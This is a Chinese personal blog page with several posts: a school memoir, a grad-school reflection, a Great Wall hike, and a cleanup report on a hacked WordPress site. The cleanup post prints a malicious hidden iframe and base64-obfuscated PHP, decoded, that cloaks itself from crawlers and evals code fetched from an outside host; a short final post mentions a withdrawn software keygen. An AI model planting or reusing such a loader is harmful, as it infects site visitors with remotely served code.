且行且远
分类: 且行且远 由 ssfighter 于 2013年4月11日 发表

博客荒废好久了,其实总是想写点什么,但是工作太忙,完全没空写。怀念读书时候的自己,总是有很多的时间,可以做许多想做的事情,遗憾的是什么都没有做。

前段时间在喷嚏网上看到了一篇《教育法西斯——魏书生》的文章。标题起的挺有吸引力的,不过更吸引我的是魏书生这个名字,感觉好熟悉,一种遥远的熟悉。我不是搞教育工作的,所以对教育工作者的名字都比较陌生,但是这个名字似乎在很多很多年前就听说过。仔细想了好久,猛地想起,在我初中时候,我的班主任周杰可是魏书生的坚定的拥趸。

魏书生先生做了那些事情,我并不知道,在网上搜了一下他的教学方法,让我大感意外的是他把检查改成了说明书。我不知道魏书生是怎么使用他的这条手段的,反正周杰是很好地学习了这个教育方法。在我初中三年时间里,班里无论谁犯了错误,从来没有人写过检查,写的都叫“说明书”。我不知道换一个名字能换出什么花样来,网上有人说“写检查越写越恨老师,写说明书越写越恨自己”,我倒是没有这种感觉,我唯一感到的是,只是换了个名字而已,换汤不换药,哦不,比写检查更难的是,你要更痛心疾首地承认自己的过错。

为什么要写说明书呢?美其名曰,这不是检查,你把你自己的想法说出来就好,如果你认为没错,你可以不承认错误。听听,耳熟吗?像不像大鸣大放?周杰可算是把我党这套整人的手段学的淋漓尽致。初中的时候,正是青春期,大家都比较叛逆,也都有自己的想法。我印象最深的就是,周杰让某人去写说明书,他就真的不按照检查那么写,把自己的想法说了出来,然后周杰大发雷霆,号召全班同学去批斗他,这得亏是他的心理素质好,要是我这样脆弱的内心,估计早就崩溃了。我年纪小,没经历过反右和文革,但是却在初中的三年里见识了什么叫反右,什么叫文革。当然,这话说的夸张了点,阶级斗争远远没有那么严重,充其量也就是见识了斗争方式和斗争手段,并没有那么残酷的斗争。

我没看过魏书生先生的著作,也不知道他的理论,所以我只能说说周杰了。按照她的说法,她的教育方式都是跟魏书生学的。我知道她最喜欢在班级里树立权威——诶,怎么还是很熟悉——绝对的权威。我印象最深的就是有次她生病了,据说全班只有我和姜某两个人没有去她家探望她,她在康复之后就在全班点名批评我们俩,为什么不到她家里去看她。然后,号召全班同学展开大讨论——当然,每次她批评别人之后,都要让全班同学一起讨论,看看她批评的对不对——诶?怎么还是觉得很熟悉?最后的结果呢?是我妈、他妈带着我们俩集体去周杰家赔礼道歉。从那之后至今,十多年的时间里,每次我想到这事,都恨得牙根痒痒。我承认,老师生病了,作为学生不去探望是有点不近人情,可是我真的觉得,那个时候我才是个初中生,能明白这么多的人情世故吗?再退一步说,去看你是人情,不看你是本分,怎能强求别人去探病呢?师者,传道授业解惑。第一项就是传道。作为教书育人的人,就用这种法西斯式的方式去育人吗?

我想,魏书生先生的教育理论或许是出自善意,至少因为我没有接触,所以不敢说他的教育是法西斯。但我真真切切地看到了他的追随者之一,是如何把他的理论作为威权统治的纲领。周杰在教完我们之后,也平步青云,现在当上了大连理工大学附属中学的校长了。我想,当了校长,应该就不再需要直接教育学生了,她的那套写说明书,集体大讨论的做法应该不至于直接应用到学生身上了吧。

教育的目的,是使人成为人。我们的国家曾经偏离主流价值观太远,造成了许多教育工作者的价值观也都扭曲了。树立威权、鼓动群众斗群众的这些做法,也都曾经成为我们教育内容的一部分,也搞坏了如我这样的许多人的心智。育人是一件很难的事情,真的希望以后不要再有法西斯般的狼奶教育,这些教育或许让管理班级变得容易,或许从短时间来看学生有了纪律有了成绩,但这种教育真的离育人太远了,如果教育不能把人培养成一个完整的人,那无论教给他了多少知识,教育都是失败的。


分类: 随心所记 由 ssfighter 于 2012年10月30日 发表

这两天饭否上搞了一个热门话题,是“给五年前的自己”,参与的人还挺多。五年前的此时此刻,我正在干什么,我说不好,但我可以清楚地记得那一段时间,我处于怎样的状态,我是怎样的纠结。

五年前的这时候,我刚来到中科院读研,从进入中科院的第一天起,我就不喜欢这个地方,与这里格格不入,所以那段时间,我买了个MP3,在里面装满了评书,从早到晚地听。那个时候,我的典型标志就是,从早到晚带着个耳机,把自己封闭起来,用自己的内心对抗整个世界。

五年前的此时,经历了很多很多不顺心的事情,甚至在接下来的两年里,各种不顺,亦接踵而来。那个时候,有了很多以前不曾有的爱好,例如攒机。在此之前我对电脑硬件一窍不通,那时候为了排遣寂寞,几乎天天去泡中关村的卖场,当然,永远是一个人,戴着耳机。

五年前的此时,我来到中科院读书,并在这里度过了异常艰难的三年研究生生活。在刚到中科院的时候,我的作息令我自己都难以相信。我每天下课回到宿舍就看书、写作业;换下来的衣服当时就洗,从来不攒任何脏衣服;每天晚上11点上床睡觉;一个月肯定洗一次床单和被罩;每天起床叠被,把自己的床铺、桌子收拾的整整齐齐。虽然这些东西其实不算什么,很多人都是一直这样做的,但是像我这样常年的脏乱差,能做成这样,真的是连我自己都不敢相信。

五年前的那段时间,是我印象最深的时刻,以至于我根本不需要翻看以前的日记和饭否,就能清楚地记得我那时候在做什么,在想什么,在经历着什么。

对五年前的自己应该说什么呢?总觉得有太多太多想说的,可又不知道该说点什么。想来想去,只好对那时候的自己说:

有些事情,看淡一些,有些人,别太在意,有些经历,无法避免。坚持,咬牙走过最困难的时候就好了。

 


分类: 漫步九州 由 ssfighter 于 2012年7月30日 发表

今天终于有时间去了趟样边长城,仔细想来这应该是我第四次找样边长城了,前两次都在镇边城那边转,所以都没找到,后来在网上仔细查了一下路线,第三次是两个月前,终于找到了庙港村,但是往里走发现里面正在修路,只好退出来去了大营盘长城,今天早晨起来后发现天气特别好,于是决定和牙牙一起出去转转,再去找找样边长城。

今天天公作美,天气非常好,到庙港村后发现路已经修好了,但是并不是这条修好的柏油路能直接通到长城脚下,后面还是要驱车走一段土路,路不算难走,轿车的话应该也能上去。

样边长城是徐达修建的,作为长城的样板工程,虽然历经六百多年的沧桑,有些地方已经坍塌了,但是仍然显得非常宏伟壮阔,很多地方的外墙依然非常完整,石材非常好,比北京周边的很多残长城还是要好不少的,也不愧是当年的样板工程啊。

今天天气非常好,能见度很高,能远眺到北边的官厅水库,贴几张照片吧。

更多的照片可以直接看相册:
http://photo.ssfighter.com/index.php?album=2012-07-29yangbian

去样边长城和大营盘长城的路线可以看越野e族上的这篇文章:
http://bbs.fblife.com/thread_1615652.html


分类: 编程菜园 由 ssfighter 于 2012年7月2日 发表

今天早晨登录自己的博客,忽然发现被报成了有害站点,一查,Google说该网站被挂马了,很奇怪啊,我自己这么小的网站都会被挂马?一开始还不太相信,因为自己看页面源代码的时候一点问题都没有,还以为是Google搞错了,后来用Rex Swain’s HTTP Viewer看了一下才发现,原来我的http://blog.ssfighter.com/果然有一个iframe:

<iframe src="http://directs33.in/in.cgi?55764" width="1" height="1" frameborder="0"></iframe>

看来果然是被挂马了,可是我的主页上却没有被挂马,相册、维基也没事,而在我空间上挂的别人的博客却也被挂上了一样的木马,非常奇怪,但却死活都找不到木马到底挂在了哪个文件上。grep了一通也没找到,最后从网上下载了一份新的Wordpress,把自己Wordpress的代码和干净的Wordpress比对了一下,发现了点问题,在wp-content/index.php文件里面发现了这么一段:

<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKJHozNz0ic3RhdHMiOwokdWEzPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJHUzNyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgIk1hYyIsICJpbnV4IiwgIlgxMSIpOwppZigocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJHUzNykgLiAiL2kiLCAkdWEzKSkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSkgPT0wKSAgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJdKSkgIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pID09MCkgKQp7fQplbHNlCnsKQHNldGNvb2tpZSgkejM3LG1kNSgic3RhdHMiKSx0aW1lKCkrMTcyODAwKTsKJHVybCA9ICJodHRwOi8vNDA0MGVudC5jb20vc2Vzc2lvbi5waHA/aWQiOwokaWZyYW1lPUBldmFsKGZpbGVfZ2V0X2NvbnRlbnRzICgkdXJsKSk7CmlmICgkaWZyYW1lKSBlY2hvKCRpZnJhbWUpOyAKfQoK'));/*68066*/ ?>

看来这就是问题所在,用Base64给那一大堆字符解码,可以看到:

error_reporting(0);
set_time_limit(0);
$z37="stats";
$ua3=$_SERVER["HTTP_USER_AGENT"];
$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Mac", "inux", "X11");
if((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_SERVER["HTTP_REFERER"]) ==0)  or (isset($_SERVER["HTTP_COOKIE"]))  or (isset($_SERVER["HTTP_USER_AGENT"]) ==0) )
{}
else
{
@setcookie($z37,md5("stats"),time()+172800);
$url = "http://4040ent.com/session.php?id";
$iframe=@eval(file_get_contents ($url));
if ($iframe) echo($iframe);
}

果然,这里就是挂的马,这个68066的注释很有意思,正好用这个作为特征值在wordpress目录下用grep扫一遍:

grep -r '68066' ./

可以发现所有的index.php文件都被挂马了,再回到www的根目录下发现果然是所有的index.php都在头上加了这么一段,把这些东西都清除掉,万事大吉。再查,在非www目录里的index.php都没有被感染。

很抱歉一直没发现自己的博客被挂马,影响了大家,真对不起。我已经向Google申请review,希望能尽快把这个“已被报告的攻击站点”给去掉。最后总结一下,尽管是小站,还是要多加注意,以前完全没想到自己一个个人的小站也会被挂马,没仔细查原因,看起来似乎是从FTP那边进攻的,先把FTP服务给关掉好了,反正自己一时半会也用不到。


分类: 逆向手札 由 ssfighter 于 2012年5月14日 发表

Mathtype 6.8的注册机,需要的下载吧。其实0day一周前就已经放出来Keygen了,这个已经很晚啦。

抱歉,不再提供注册机的下载

Enjoy it!